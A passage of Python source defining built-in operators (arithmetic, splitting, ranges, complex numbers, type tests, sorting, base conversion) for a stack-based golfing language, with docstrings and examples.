or a list of lists, of pairs of\n elements. On a block and two sequences (number coerce to ranges),\n make a \"table\" of results of mapping pairs of elements. For the\n flat versions, see {{ '*'|b }} or {{ 'B'|b }}.\"\"\",\n stability=\"alpha\")\n\n cput('Mul_or_xloop', ['*'], [\n Case.number2(lambda env, a, b: [num.pd_mul(a, b)]),\n Case.number_seq(lambda env, n, seq: [pd_mul_seq(seq, n)]),\n Case.seq2(lambda env, a, b: [pd_cartesian_product_seq_flat(a, b)]),\n Case.block_seq_range(lambda env, block, seq:\n pd_foreach_x_only_then_empty_list(env, block, seq)),\n ],\n docs=\"\"\"Multiplication on numbers. Repetition on sequences with\n numbers. \"Flat\" Cartesian product on two sequences (this returns a\n single-level list of pairs, rather than a list of lists of pairs;\n if you want the latter, see {{ 'T'|b }}). X-loop on blocks and\n sequences, in which elements and corresponding indices are pushed\n onto the X-stack, but not pushed onto the stack (numbers coerce to\n ranges, so, if you don't use the variable X, it's just repeating a\n block some number of times.)\n\n See also {{ 'xloop'|bt }}.\n\n ex: 3 {2*} 4* => 48\n {X} 4* => 0 1 2 3\n [2 3 5 7] {2X#} * => 4 8 32 128\"\"\",\n stability=\"beta\")\n # }}}\n # \"Division\" and \"modulo\" (for-each, splitting, etc.) {{{\n cput('Div_or_split_or_each', ['/'], [\n Case.number2(lambda env, a, b: [num.pd_div(a, b)]),\n Case.number_seq(lambda env, n, seq: [pd_split_seq(seq, n, include_leftover=True)]),\n Case.seq2(lambda env, seq, tok: [pd_split_seq_by(seq, tok)]),\n Case.block_seq_range(lambda env, block, seq:\n pd_foreach_then_empty_list(env, block, seq)),\n ],\n docs=\"\"\"Float division on numbers. On a sequence and number, split\n the sequence into chunks of size equal to the number, including\n leftovers if any. On two sequences, split the first sequence around\n occurrences of the second sequence. For-each on blocks and\n sequences (numbers coerce to ranges).\n\n See also {{ 'Intdiv_or_split_discard'|b }}.\n\n ex:\n [1 2 3 4]2/ => [[1 2][3 4]]\n [1 2 3 4 5]2/ => [[1 2][3 4][5]]\n \"tweedledee\"\"e\"% => [\"tw\" \"\" \"dl\" \"d\" \"\" \"\"]\n \"\"\",\n stability=\"stable\")\n\n cput('Intdiv_or_split_discard', ['÷'], [\n Case.number2(lambda env, a, b: [num.pd_intdiv(a, b)]),\n Case.number_seq(lambda env, n, seq: [pd_split_seq(seq, n, include_leftover=False)]),\n ],\n docs=\"\"\"Integer division on numbers. On a sequence and number,\n split the sequence into chunks of size equal to the number,\n discarding leftovers.\n\n ex: [1 2 3 4]2/ => [[1 2][3 4]]\n [1 2 3 4 5]2/ => [[1 2][3 4]]\n \"\"\",\n stability=\"beta\")\n\n cput('Mod_or_slice_mod_or_split_nonempty_or_map', ['%'], [\n Case.number2(lambda env, a, b: [num.pd_mod(a, b)]),\n Case.number_seq(lambda env, n, seq: [pd_deref(seq)[::num.intify(n)]]),\n Case.seq2(lambda env, seq, tok: [[s for s in pd_split_seq_by(seq, tok) if s]]),\n Case.block_seq_range(lambda env, block, seq: [pd_map(env, block, seq)]),\n ],\n docs=\"\"\"Modulus on numbers. On a sequence and number, slice\n elements at indices equal to 0 mod the number, just like Python\n s[::n] (negative numbers reverse the sequence). On two sequences,\n split the first sequence around occurrences of the second sequence,\n discarding empty tokens. Map on blocks and sequences (numbers\n coerce to ranges).\n\n ex: \"tweedledee\"\"e\"% => [\"tw\" \"dl\" \"d\"]\n \"\"\",\n stability=\"stable\")\n\n cput('Div_with_zero_as_one', ['/o'], [\n Case.number2(lambda env, a, b: [num.pd_div(a, b) if b else a]),\n ],\n docs=\"\"\"Float division except that if the second argument is 0 it\n just returns the first argument.\"\"\",\n stability=\"unstable\")\n cput('Intdiv_with_zero_as_one', ['÷o'], [\n Case.number2(lambda env, a, b: [num.pd_intdiv(a, b) if b else a]),\n ],\n docs=\"\"\"Integer division except that if the second argument is 0 it\n just returns the first argument.\"\"\",\n stability=\"unstable\")\n\n cput('Positive_biased_balanced_mod', ['%â'], [\n Case.number2(lambda env, a, b: [num.pd_positive_biased_balanced_mod(a, b)]),\n ],\n docs=\"\"\"Balanced mod: on a and b, returns the number that's equal\n to a mod b and as close to 0 as possible, preferring |b|/2 over\n -|b|/2.\"\"\",\n stability=\"unstable\")\n cput('Negative_biased_balanced_mod', ['%û'], [\n Case.number2(lambda env, a, b: [num.pd_negative_biased_balanced_mod(a, b)]),\n ],\n docs=\"\"\"Balanced mod: on a and b, returns the number that's equal\n to a mod b and as close to 0 as possible, preferring -|b|/2 over\n |b|/2.\"\"\",\n stability=\"unstable\")\n\n zip_cases = [\n Case.seq2_range(lambda env, a, b: [pd_zip_as_list(a, b)]),\n Case.seq2_range_block(lambda env, seq1, seq2, block:\n [pd_zip(env, block, seq1, seq2)]),\n ]\n cput('Divmod_or_zip', ['‰', '%p'], [\n Case.number2(lambda env, a, b: [num.pd_intdiv(a, b), num.pd_mod(a, b)]),\n ] + zip_cases,\n docs=\"\"\"On integers, integer division and modulus. On two sequences\n or a block and two sequences, {{ 'Zip'|b }}.\"\"\",\n stability=\"unstable\")\n # }}}\n\n cput('Power', ['ˆ', '*p'], [\n Case.number2(lambda env, a, b: [num.pd_pow(a, b)]),\n Case.number_seq(lambda env, n, s: [pd_pow_seq(s, n)]),\n ],\n docs=\"\"\"On numbers, power/exponentiate. On a list and a number,\n exponentiate the list by making a list of all lists of that length\n composed of elements from the original list (possibly repeating).\n \"\"\",\n stability=\"beta\")\n\n cput('Int_sqrt', ['Si'], [\n Case.number(lambda env, a: [num.intify(num.numerify(a) ** 0.5)]),\n ],\n docs=\"\"\"Integer square root.\"\"\",\n stability=\"alpha\")\n\n cput('Find_index', ['@'], [\n Case.number_seq(lambda env, n, seq:\n [pd_find_index(env, n, seq)]),\n Case.seq2(lambda env, haystack, needle:\n [pd_find_substring_index(env, needle, haystack)]),\n Case.block_seq_range(lambda env, block, seq:\n [pd_get_index(env, block, seq)]),\n ],\n docs=\"\"\"Inside a sequence (numbers coerce to ranges), find the\n first index of an element, a substring, or something satisfying a\n block. Mnemonic: finds where the element is AT.\"\"\",\n stability=\"beta\")\n\n abs_diff_case = Case.number2(lambda env, a, b: [num.pd_abs(num.pd_sub(a, b))])\n cput('Abs_diff', ['Ad'], [abs_diff_case],\n docs=\"\"\"Absolute difference of two numbers.\"\"\",\n stability=\"stable\", golf_aliases=['±'])\n\n filter_and_reject_case = Case.block_seq_range(lambda env, block, seq:\n list(pd_filter_and_reject(env, block, seq)))\n cput('±', [], [abs_diff_case, filter_and_reject_case],\n docs=\"\"\"On two numbers, absolute difference (mnemonic: + is\n for \"positive\" and - is for \"difference\".) On a list and a block,\n filter-and-reject: push the list of elements on which the predicate\n is true and the list of elements on which the predicate is\n false.\"\"\",\n stability=\"stable\")\n\n cput('Clamped_subtract', ['-c'], [\n Case.number2(lambda env, a, b: [pd_max(num.pd_sub(a, b), 0)]),\n ],\n docs=\"\"\"Subtraction clamped to zero, or saturating subtraction: the\n maximum of the subtraction or 0.\"\"\",\n stability=\"unstable\")\n\n cput('Plus_ints', ['+i'], [\n Case.int2_coerce(lambda env, a, b: [a + b]),\n ],\n docs=\"\"\"Add two things after coercing both to integers. \"\"\",\n stability=\"alpha\")\n cput('Plus_lengths', ['+l'], [\n Case.number2_len(lambda env, a, b: [num.pd_add(a, b)]),\n ],\n docs=\"\"\"Add two things after coercing both to ints or floats,\n sequences by taking their length.\"\"\",\n stability=\"unstable\")\n cput('Minus_ints', ['-i'], [\n Case.int2_coerce(lambda env, a, b: [a - b]),\n ],\n docs=\"\"\"Subtract two things after coercing both to integers.\"\"\",\n stability=\"unstable\")\n cput('Minus_lengths', ['-l'], [\n Case.number2_len(lambda env, a, b: [num.pd_sub(a, b)]),\n ],\n docs=\"\"\"Subtract two things after coercing both to ints or floats,\n sequences by taking their length.\"\"\",\n stability=\"unstable\")\n # }}}\n # Dictionary, translate, whatever {{{\n cput('Dictionary', ['Dc'], [\n Case.seq(lambda env, seq: [Hoard.dictionary_from_general_iterable(pd_iterable(seq))]),\n ],\n docs=\"\"\"Convert to new dictionary hoard.\"\"\",\n stability=\"unstable\")\n\n cput('Index_translate', ['It'], [\n Case.seq2_singleton(lambda env, seq, table: [pd_index_translate(seq, table)]),\n ],\n docs=\"\"\"Translate the first argument by indexing into the second.\"\"\",\n stability=\"unstable\")\n cput('Translate', ['Zt'], [\n Case.seq3_singleton(lambda env, seq, src, tgt: [pd_translate(seq, src, tgt)]),\n ],\n docs=\"\"\"Translate the first argument using a mapping obtained by\n zipping the second and third, mapping elements of the second to\n elements of the third, repeating the last element of the third as\n necessary.\"\"\",\n stability=\"alpha\")\n cput('One_time_translate', ['Ot'], [\n Case.seq3_singleton(lambda env, seq, src, tgt: [pd_one_time_translate(seq, src, tgt)]),\n ],\n docs=\"\"\"Translate the first argument using a mapping obtained by\n zipping the second and third, repeating the last element of the\n third as necessary. Each entry in the mapping is used at most once,\n in the order they appear.\"\"\",\n stability=\"alpha\")\n # }}}\n # Acute/grave vowels {{{\n cput('Plus_deep_vectorizing', ['Á'], [\n Case.value2(lambda env, a, b: [pd_deepvectorize_nn2v(num.pd_add, a, b)]),\n ],\n docs=\"\"\"Addition on numbers; deeply vectorizes.\"\"\",\n stability=\"unstable\")\n cput('Minus_deep_vectorizing', ['À'], [\n Case.value2(lambda env, a, b: [pd_deepvectorize_nn2v(num.pd_sub, a, b)]),\n ],\n docs=\"\"\"Subraction on numbers; deeply vectorizes.\"\"\",\n stability=\"unstable\")\n cput('Two_power_vectorizing', ['É'], [Case.value_n2v(lambda e: 2**e)],\n docs=\"\"\"Two to the power of numbers. Deeply vectorizes.\"\"\",\n stability=\"alpha\")\n cput('Square_deep', ['È'], [Case.value_n2v(lambda e: e**2)],\n docs=\"\"\"Square of numbers. Deeply vectorizes.\"\"\",\n stability=\"alpha\")\n cput('Inverse', ['Í'], [Case.value_n2v(lambda e: 1/e)],\n docs=\"\"\"Inverse (reciprocal) of numbers. Deeply vectorizes.\"\"\",\n stability=\"alpha\")\n cput('Negate_deep', ['Ì'], [Case.value_n2v(lambda e: -e)],\n docs=\"\"\"Negate numbers. Deeply vectorizes.\"\"\",\n stability=\"alpha\")\n cput('Multiply_deep_vectorizing', ['Ó'], [\n Case.value2(lambda env, a, b: [pd_deepvectorize_nn2v(num.pd_mul, a, b)]),\n ],\n docs=\"\"\"Multiplication on numbers; deeply vectorizes.\"\"\",\n stability=\"unstable\")\n cput('Divide_deep_vectorizing', ['Ò'], [\n Case.value2(lambda env, a, b: [pd_deepvectorize_nn2v(num.pd_div, a, b)]),\n ],\n docs=\"\"\"Division on numbers; deeply vectorizes.\"\"\",\n stability=\"unstable\")\n cput('Modulus_deep_vectorizing', ['Ú'], [\n Case.value2(lambda env, a, b: [pd_deepvectorize_nn2v(num.pd_mod, a, b)]),\n ],\n docs=\"\"\"Modulus on numbers; deeply vectorizes.\"\"\",\n stability=\"unstable\")\n # }}}\n # Conversions / loopy things: C, F, I, S {{{\n to_char_case = Case.value(lambda env, a: [pd_to_char(a)])\n to_float_case = Case.value(lambda env, a: [pd_to_float(a)])\n to_int_case = Case.value(lambda env, a: [pd_to_int(a)])\n to_string_case = Case.value(lambda env, a: [env.pd_str(a)])\n\n cput('To_char', [ ], [to_char_case ], docs=\"Convert to char\", stability=\"beta\", golf_aliases=['C'])\n cput('To_float', [ ], [to_float_case ], docs=\"Convert to float\", stability=\"beta\", golf_aliases=['F'])\n cput('To_int', [ ], [to_int_case ], docs=\"Convert to int\", stability=\"beta\", golf_aliases=['I'])\n cput('To_string', ['S'], [to_string_case], docs=\"Convert to string\", stability=\"beta\")\n\n cput('Imaginary_part', [';j'], [Case.value_n2v(lambda e: e.imag)], stability=\"unstable\", docs=\"Imaginary part. Deeply vectorizes because why not. Mnemonic: deletes part of the complex number like {{ ';'|b }}. Keeps the imaginary part rather than deleting it because direct conversion to float, {{ 'F'|b }}, already computes the real part.\")\n cput('Complex_components', ['~j'], [Case.number(lambda _env, e: [e.real, e.imag])], stability=\"unstable\", docs=\"Real and imaginary part, as two elements on the stack. Mnemonic: Treating the complex number as a length-2 list, this expands it like {{ '~'|b }}.\")\n cput('Complex_components_array', ['Aj'], [Case.number(lambda _env, e: [[e.real, e.imag]])], stability=\"unstable\", docs=\"Real and imaginary part, as a list of two elements on the stack. Mnemonic: A for array as usual.\")\n cput('Reduce_complex', ['Rj'], [Case.value(lambda env, e: [pd_deep_reduce_complex(e)])], stability=\"unstable\", docs=\"Create a complex number for a list with a real and imaginary part. Actually, for a full list, multiplies successive elements by powers of 1j and computes the sum of all the results. Mnemonic: This is shaped like a reduce because it takes a list and returns a single number.\")\n cput('+j', [], [Case.number2(lambda env, a, b: [num.numerify(a) + num.numerify(b) * 1j])], stability=\"alpha\", docs=\"First number plus second number times the imaginary unit.\")\n cput('-j', [], [Case.number2(lambda env, a, b: [num.numerify(a) - num.numerify(b) * 1j])], stability=\"alpha\", docs=\"First number minus second number times the imaginary unit.\")\n cput('*j', [], [Case.value_n2v(lambda e: e * 1j)], stability=\"alpha\", docs=\"Multiply by the imaginary unit. Deeply vectorizes.\")\n cput('/j', [], [Case.value_n2v(lambda e: e * -1j)], stability=\"alpha\", docs=\"Divide by the imaginary unit; equivalently, multiply by -1j. Deeply vectorizes.\")\n cput('\\\\j', [], [Case.value_n2v(lambda e: e.imag + e.real * 1j)], stability=\"alpha\", docs=\"Swap the real and imaginary part. Deeply vectorizes.\")\n cput('Conjugate', ['Mj'], [Case.value_n2v(lambda e: e.conjugate())], stability=\"alpha\", docs=\"Negate the imaginary part. Deeply vectorizes.\")\n cput('Negate_real', ['|j'], [Case.value_n2v(lambda e: -e.conjugate())], stability=\"unstable\", docs=\"Negate the real part. Deeply vectorizes. Mnemonic: reflect this across the vertical y-axis on the complex plane. (Really really unstable.)\")\n cput('Imaginary_unit_power', ['^j', 'ˆj'], [Case.value_n2v(lambda e: 1j ** e)], stability=\"unstable\", docs=\"Take the power of the imaginary unit to this number. Deeply vectorizes.\")\n cput('Pure_imaginary', ['&j', '?j'], [Case.value_n2v(lambda e: int(e.real == 0))], stability=\"unstable\", docs=\"Test if the real part is zero. Deeply vectorizes.\")\n cput('Not_imaginary', ['!j'], [Case.value_n2v(lambda e: int(e.imag == 0))], stability=\"unstable\", docs=\"Test if the imaginary part is zero. Deeply vectorizes.\")\n\n peekdo_case = Case.block(lambda env, body: pd_do_then_empty_list(env, body, peek=True))\n iterate_case = Case.block(lambda env, body: [pd_iterate(env, body)[0]])\n fixed_point_case = Case.block(lambda env, body: [pd_iterate(env, body)[1]])\n\n cput('Peekdo', [], [peekdo_case],\n docs=\"\"\"Like {{ 'Doloop'|b }} except the condition is peeked\n instead of popped.\"\"\",\n stability=\"beta\",\n golf_aliases=['D'])\n cput('Fixed_point', [], [fixed_point_case],\n docs=\"\"\"Iterate a block, peeking at the stack between iterations,\n until a value repeats. Pushes that value. (This is more general\n than a \"fixed point\" as usually defined since it doesn't require a\n value to repeat after just one iteration.)\"\"\",\n stability=\"alpha\",\n golf_aliases=['F'])\n cput('Iterate', [], [iterate_case],\n docs=\"\"\"Iterate a block, peeking at the stack between iterations,\n until a value repeats. Pushes all values peeked until (excluding)\n the repeated value.\"\"\",\n stability=\"unstable\",\n golf_aliases=['I'])\n\n cput('To_char_or_peekloop', ['C'], [to_char_case, peekdo_case],\n docs=\"\"\"On a non-block value, {{ 'To_char'|b }}; on a block,\n {{ 'Peekdo'|b }}. Mnemonic: \"C\" is right next to \"D\" and it's a\n homophone of \"see\", which is a synonym of \"peek\".\"\"\",\n stability=\"alpha\")\n\n cput('To_float_or_fixed_point', ['F'], [to_float_case, fixed_point_case],\n docs=\"\"\"On a non-block value, {{ 'To_float'|b }}; on a block,\n {{ 'Fixed_point'|b }}.\"\"\",\n stability=\"beta\")\n cput('To_int_or_iterate', ['I'], [to_int_case, iterate_case],\n docs=\"\"\"On a non-block value, {{ 'To_float'|b }}; on a block,\n {{ 'Iterate'|b }}.\"\"\",\n stability=\"beta\")\n\n cput('Int_groups', ['Ig'], [Case.str_(lambda env, x: [[int(m) for m in re.findall(r\"-?\\d+\", x)]])],\n docs=\"Finds integer-looking parts of a string and converts them to integers.\",\n stability=\"alpha\")\n cput('Float_groups', ['Fg'], [Case.str_(lambda env, x: [[float(m) for m in re.findall(r\"-?\\d+(?:\\.\\d+)?(?:e\\d+)?|\\.\\d+(?:e\\d+)?\", x)]])],\n docs=\"Finds float-looking parts of a string and converts them to floats.\",\n stability=\"alpha\")\n # }}}\n # Type predicates {{{\n cput('Is_int', [':i'], [\n Case.any(lambda env, x: [int(isinstance(x, int))]),\n ], docs=\"Test if integer\", stability=\"alpha\")\n cput('Is_char', [':c'], [\n Case.any(lambda env, x: [int(isinstance(x, Char))]),\n ], docs=\"Test if Char\", stability=\"alpha\")\n cput('Is_float', [':f'], [\n Case.any(lambda env, x: [int(isinstance(x, float))]),\n ], docs=\"Test if float\", stability=\"alpha\")\n cput('Is_complex', [':j'], [\n Case.any(lambda env, x: [int(isinstance(x, complex))]),\n ], docs=\"Test if complex\", stability=\"alpha\")\n cput('Is_number', [':n'], [\n Case.any(lambda env, x: [int(isinstance(x, (Char, int, float, complex)))]),\n ], docs=\"Test if number (char, int, float, complex)\", stability=\"alpha\")\n cput('Is_string', [':s'], [\n Case.any(lambda env, x: [int(isinstance(x, str))]),\n ], docs=\"Test if string\", stability=\"alpha\")\n cput('Is_array', [':a'], [\n Case.any(lambda env, x: [int(isinstance(x, (list, range)))]),\n ], docs=\"Test if array (or range)\", stability=\"alpha\")\n cput('Is_block', [':b'], [\n Case.any(lambda env, x: [int(isinstance(x, Block))]),\n ], docs=\"Test if block\", stability=\"alpha\")\n cput('Is_hoard', [':h'], [\n Case.any(lambda env, x: [int(isinstance(x, Hoard))]),\n ], docs=\"Test if hoard\", stability=\"alpha\")\n # }}}\n # Sort, $; test for sortedness; order_statistic {{{\n cput('Sort', [], [\n Case.seq(lambda env, s: [pd_sort(s)]),\n Case.block_seq_range(lambda env, f, s: [pd_sort(s, (env, f))]),\n ], docs=\"Sort\", stability=\"stable\", golf_aliases=['$'])\n cput('Sort_or_stack_select', ['$'], [\n Case.number(lambda env, n: [env.index_stack(num.intify(n))]),\n Case.seq(lambda env, s: [pd_sort(s)]),\n Case.block_seq_range(lambda env, f, s: [pd_sort(s, (env, f))]),\n ], docs=\"Sort or select from stack\", stability=\"beta\")\n cput('Order_statistic', ['¢'], [\n Case.list_number(lambda env, x, i: [pd_to_sorted(x)[num.intify(i)]]),\n Case.str_number(lambda env, s, i: [Char(sorted(s)[num.intify(i)])]),\n ], docs=\"Order statistic (zero-indexed)\", stability=\"alpha\")\n cput('Is_sorted', ['$p'], [\n Case.seq(lambda env, s: [int(all(pd_lte(a, b) for a, b in pd_zip_with_tail(s)))]),\n ], docs=\"Test if sorted\", stability=\"beta\")\n cput('Is_strictly_increasing', ['p'], [\n Case.seq(lambda env, s: [int(all(pd_less_than(b, a) for a, b in pd_zip_with_tail(s)))]),\n ], docs=\"Test if strictly decreasing\", stability=\"beta\")\n # }}}\n # Range/enumerate/flatten; Comma, J {{{\n range_case = Case.number(lambda env, n: [range(num.intify(n))])\n cput('Range', [], [range_case],\n docs=\"Range (half-open from 0).\", stability=\"beta\",\n golf_aliases=[','])\n range_one_case = Case.number(lambda env, n: [range(1, num.intify(n) + 1)])\n cput('Range_one', [], [range_one_case],\n docs=\"Range, inclusive from 1. \", stability=\"beta\",\n golf_aliases=['J'])\n\n enumerate_case = Case.seq(lambda env, seq: [pd_enumerate(seq)])\n cput('Enumerate', [], [enumerate_case],\n docs=\"Zip with indices from 0.\", stability=\"beta\",\n golf_aliases=[','])\n enumerate_one_case = Case.seq(lambda env, seq: [pd_enumerate(seq, start=1)])\n cput('Enumerate_one', [], [enumerate_one_case],\n docs=\"Zip with indices from 1.\", stability=\"beta\",\n golf_aliases=['J'])\n filter_indexes_case = Case.block_seq_range(lambda env, block, seq: [pd_filter_indexes(env, block, seq)])\n cput('Filter_indexes', [], [filter_indexes_case],\n docs=\"List indices at which block is true. Short: {{ ','|b }}\", stability=\"beta\",\n golf_aliases=[','])\n\n cput('Range_enumerate_or_filter_indices', [','], [\n range_case,\n enumerate_case,\n filter_indexes_case,\n ],\n docs=\"\"\"Range on numbers. Enumerate (zip with indices from 0) on\n sequences. On block and sequence, list indices at which block is\n true.\n\n Compare {{ 'Range_enumerate_one_or_reject_indices'|b }}.\n \"\"\", stability=\"beta\")\n\n cput('Range_len_keep', ['´'], [\n Case.number(lambda env, n: [n, range(num.intify(n))]),\n Case.seq(lambda env, seq: [seq, range(len(seq))]),\n ],\n docs=\"\"\"Range on numbers; range of indices of sequence. Keeps the\n operand on the stack! Mnemonic: looks like a comma, except it's\n higher, so the stack will be taller after running it.\"\"\",\n stability=\"unstable\")\n\n cput('Range_enumerate_one_or_reject_indices', ['J'], [\n range_one_case,\n enumerate_one_case,\n Case.block_seq_range(lambda env, block, seq: [pd_filter_indexes(env, block, seq, negate=True)]),\n ],\n docs=\"\"\"Range, inclusive from 1, on numbers. Enumerate from 1 (zip\n with indices from 1) on sequences. On block and sequence, list\n indices at which block is false. Mnemonic: the letter J looks like\n a big comma.\n\n Compare {{ 'Range_enumerate_or_filter_indices'|b }}.\n \"\"\", stability=\"beta\")\n\n range_til_case = Case.number2(lambda env, lo, hi: [range(num.intify(lo), num.intify(hi))])\n range_to_case = Case.number2(lambda env, lo, hi: [range(num.intify(lo), num.intify(hi) + 1)])\n cput('Exclusive_range', ['Tl'], [range_til_case],\n stability=\"beta\")\n cput('Inclusive_range', ['To'], [range_to_case],\n stability=\"beta\")\n flatten_once_case = Case.seq(lambda env, seq: [pd_flatten_once(seq)])\n flatten_case = Case.seq(lambda env, seq: [pd_flatten(seq)])\n cput('Flatten_once', ['Fo'], [flatten_once_case],\n stability=\"beta\")\n cput('Flatten', ['Fl'], [flatten_case],\n stability=\"beta\")\n # Note: The dots are the opposite convention of Ruby, where .. is inclusive\n # and ... is exclusive. I don't particularly like that convention. The\n # three-dot range having one more element than the two-dot range makes\n # sense to me.\n cput('Exclusive_range_or_flatten_once', ['¨'], [flatten_once_case, range_til_case],\n stability=\"beta\")\n cput('Inclusive_range_or_flatten', ['…'], [flatten_case, range_to_case],\n stability=\"beta\")\n\n cput('Range_one_down', ['Dj'], [\n Case.number(lambda env, n: [range(num.intify(n), 0, -1)])\n ],\n docs=\"Range, inclusive downward from 1\", stability=\"alpha\")\n cput('Range_odds_exclusive', ['Or'], [\n Case.number(lambda env, n: [range(1, num.intify(n), 2)])\n ],\n docs=\"Range, odds, from 1, exclusive\", stability=\"unstable\")\n cput('Range_evens_exclusive', ['Er'], [\n Case.number(lambda env, n: [range(0, num.intify(n), 2)])\n ],\n docs=\"Range, evens, from 0, exclusive\", stability=\"unstable\")\n # cput('Range_odds_inclusive', ['Oj'], [\n # Case.number(lambda env, n: [range(1, num.intify(n) + 1, 2)])\n # ],\n # docs=\"Range, odds, from 1, inclusive\", stability=\"unstable\")\n # cput('Range_evens_inclusive', ['Ej'], [\n # Case.number(lambda env, n: [range(2, num.intify(n) + 1, 2)])\n # ],\n # docs=\"Range, evens, from 2, inclusive\", stability=\"unstable\")\n # }}}\n # Binary operators &|^ {{{\n cput('Bin_or_or_union_or_unless', ['|'], [\n Case.number2(lambda env, a, b: [num.pd_or(a, b)]),\n Case.seq2_range(lambda env, a, b: [pd_seq_union(a, b)]),\n Case.condition_block(lambda env, cond, block:\n pd_if_then_empty_list(env, cond, block, negate=True)),\n ],\n docs=\"\"\"Binary OR on numbers. Union on sequences. One-branch unless\n on blocks.\"\"\", stability=\"beta\")\n cput('Bin_and_or_intersection_or_if', ['&'], [\n Case.number2(lambda env, a, b: [num.pd_and(a, b)]),\n Case.seq2_range(lambda env, a, b: [pd_seq_intersection(a, b)]),\n Case.condition_block(lambda env, cond, block:\n pd_if_then_empty_list(env, cond, block)),\n ],\n docs=\"\"\"Binary AND on numbers. Intersection on sequences.\n One-branch if on blocks.\"\"\", stability=\"beta\")\n cput('Exclusive_or_or_symmetric_difference_or_find_last', ['^'], [\n Case.number2(lambda env, a, b: [num.pd_xor(a, b)]),\n Case.seq2_range(lambda env, a, b: [pd_seq_symmetric_difference(a, b)]),\n Case.block_seq_range(lambda env, block, seq:\n [second_or_error(pd_find_last_entry(env, block, seq),\n \"Entry not found in Exclusive_or_or_symmetric_difference_or_find_last\")]),\n ],\n docs=\"\"\"Binary XOR on numbers. Symmetric difference on sequences.\n Find last on block and sequence.\n \"\"\", stability=\"beta\")\n cput('Boolean_and', ['&p'], [\n Case.value2(lambda env, a, b: [b if a else a]),\n ],\n docs=\"\"\"Takes two arguments, leaves the first if the first is\n truthy and the second if the first is falsy.\"\"\",\n stability=\"beta\")\n cput('Boolean_or', ['|p'], [\n Case.value2(lambda env, a, b: [a if a else b]),\n ],\n docs=\"\"\"Takes two arguments, leaves the first if the first is\n falsy and the second if the first is truthy.\"\"\",\n stability=\"beta\")\n cput('If', [], [\n Case.any2(lambda env, cond, body:\n pd_if_then_empty_list(env, cond, body)),\n ],\n docs=\"\"\"Single-branch if.\"\"\", stability=\"alpha\")\n cput('Unless', ['Ul'], [\n Case.any2(lambda env, cond, body:\n pd_if_then_empty_list(env, cond, body, negate=True)),\n ],\n docs=\"\"\"Single-branch unless.\"\"\", stability=\"alpha\")\n @put('If_else', '?',\n docs=\"\"\"If-else.\n\n ex: 1 \"True!\" \"False\" ? => \"True!\"\n \"\"\", stability=\"beta\")\n def pd_if(env: Environment) -> None:\n c, b, a = env.pop3()\n if pytruth_eval(env, a):\n # print('True!')\n env.push_or_eval(b)\n else:\n # print('False!')\n env.push_or_eval(c)\n # }}}\n # Base {{{\n base_cases = [\n Case.number2(lambda env, n, b: [base.to_base_digits(num.intify(b), num.intify(n))]),\n Case.list_number(lambda env, lst, b: [base.from_base_digits(num.intify(b), pd_flatten_to_int_generator(lst))]),\n Case.str_number(lambda env, s, b: [int(s, num.intify(b))]),\n ]\n cput('Base', [], base_cases,\n docs=\"\"\"Base. On two numbers, converts the first to a list of\n digits in the radix of the second. On a list or a string and a\n number, interprets the sequence as digits (numbers if a list, digit\n characters if a string) in the radix of the number and converts to\n a number.\"\"\", stability=\"beta\",\n golf_aliases=['B'])\n product_map_case = Case.seq2_range_block(lambda env, seq1, seq2, block:\n [pd_map_cartesian_product(env, block, seq1, seq2, flat=True)])\n cput('Product_map', [], [product_map_case],\n docs=\"\"\"Map over the Cartesian product of two sequences, resulting\n in a list.\"\"\", stability=\"alpha\",\n golf_aliases=['B'])\n cput('Base_or_product_map', ['B'], base_cases + [product_map_case],\n docs=\"\"\"{{ 'Base'|b }} or {{ 'Product_map'|b }} (mnemonic: Bi-map,\n mapping over two things at once. Note that the result is a\n single-level list of results; for a \"table\" or a list of lists, see\n {{ 'T'|b }}.\"\"\",\n stability=\"beta\")\n cput('Lower_base', ['Lb'], [\n Case.value_number(lambda env, v, b: [pd_deepmap_n2v(\n lambda e: base.to_base_digits_lower(\n num.intify(b), num.intify(e)), v)]),\n ],\n docs=\"\"\"Converts the first number to a string of digits in the\n radix of the second, using lowercase digits. Deeply vectorizes over\n the first.\"\"\", stability=\"beta\")\n cput('Upper_base', ['Ub'], [\n Case.value_number(lambda env, v, b: [pd_deepmap_n2v(\n lambda e: base.to_base_digits_upper(\n num.intify(b), num.intify(e)), v)]),\n ],\n docs=\"\"\"Converts the first number to a string of digits in the\n radix of the second, using uppercase digits. Deeply vectorizes over\n the first.\"\"\", stability=\"beta\")\n cput('Bin_string', ['Bs'], [\n Case.value_n2v(lambda e: base.to_base_digits_upper(2, num.intify(e))),\n ],\n docs=\"\"\"Converts numbers to their binary representation as a\n string. Deeply vectorizes.\"\"\", stability=\"beta\")\n cput('Hex_string', ['Hs'], [\n Case.value_n2v(lambda e: base.to_base_digits_upper(16, num.intify(e))),\n ],\n docs=\"\"\"Converts numbers to their hexadecimal representation as a\n string. Deeply vectorizes.\"\"\", stability=\"beta\")\n cput('Digit_sum', ['Dr'], [\n Case.value_n2v(lambda e: sum(base.to_base_digits(10, num.intify(e)))),\n ],\n docs=\"\"\"Digit sum of integers. Deeply vectorizes. Mnemonic: r for\n reduce as always, since this is a reduction over the digits, and\n probably the most natural one.\"\"\",\n stability=\"alpha\")\n # }}}\n # Comparators <=> Max Min {{{\n cput('Equal', ['Eq'], [\n Case.number2(lambda env, a, b: [int(num.numerify(a) == num.numerify(b))]),\n Case.str2(lambda env, a, b: [int(a == b)]),\n Case.list2(lambda env, a, b: [int(pd_to_list(a) == pd_to_list(b))]),\n ],\n docs=\"Test for value equality.\",\n stability=\"beta\")\n cput('Equal_identity', ['Is'], [\n Case.number2(lambda env, a, b: [int(a is b)]),\n ],\n docs=\"Test for Python identity (is)\",\n stability=\"alpha\")\n cput('Equal_or_index_or_find', ['='], [\n Case.number2(lambda env, a, b: [int(num.numerify(a) == num.numerify(b))]),\n Case.hoard_immutable(lambda env, hoard, value: [hoard.index(value)]),\n Case.str2(lambda env, a, b: [int(a == b)]),\n Case.list2(lambda env, a, b: [int(pd_to_list(a) == pd_to_list(b))]),\n Case.number_seq(lambda env, n, seq: [pd_index(seq, n)]),\n Case.block_seq_range(lambda env, block, seq:\n [second_or_error(pd_find_entry(env, block, seq),\n \"Entry not found in Equal_or_index_or_find\")]),\n ],\n docs=\"\"\"On two numbers, two strings, or two lists, compare for\n equality. On a number and a sequence, index into the sequence. On a\n block and a sequence (numbers coerce to ranges), find the first\n element satisfying the block.\"\"\", stability=\"beta\")\n cput('Lt_or_slice', ['<'], [\n Case.number2(lambda env, a, b: [int(num.pd_num_cmp(a, b) < 0)]),\n Case.hoard_immutable(lambda env, hoard, value: [hoard.slice(None, 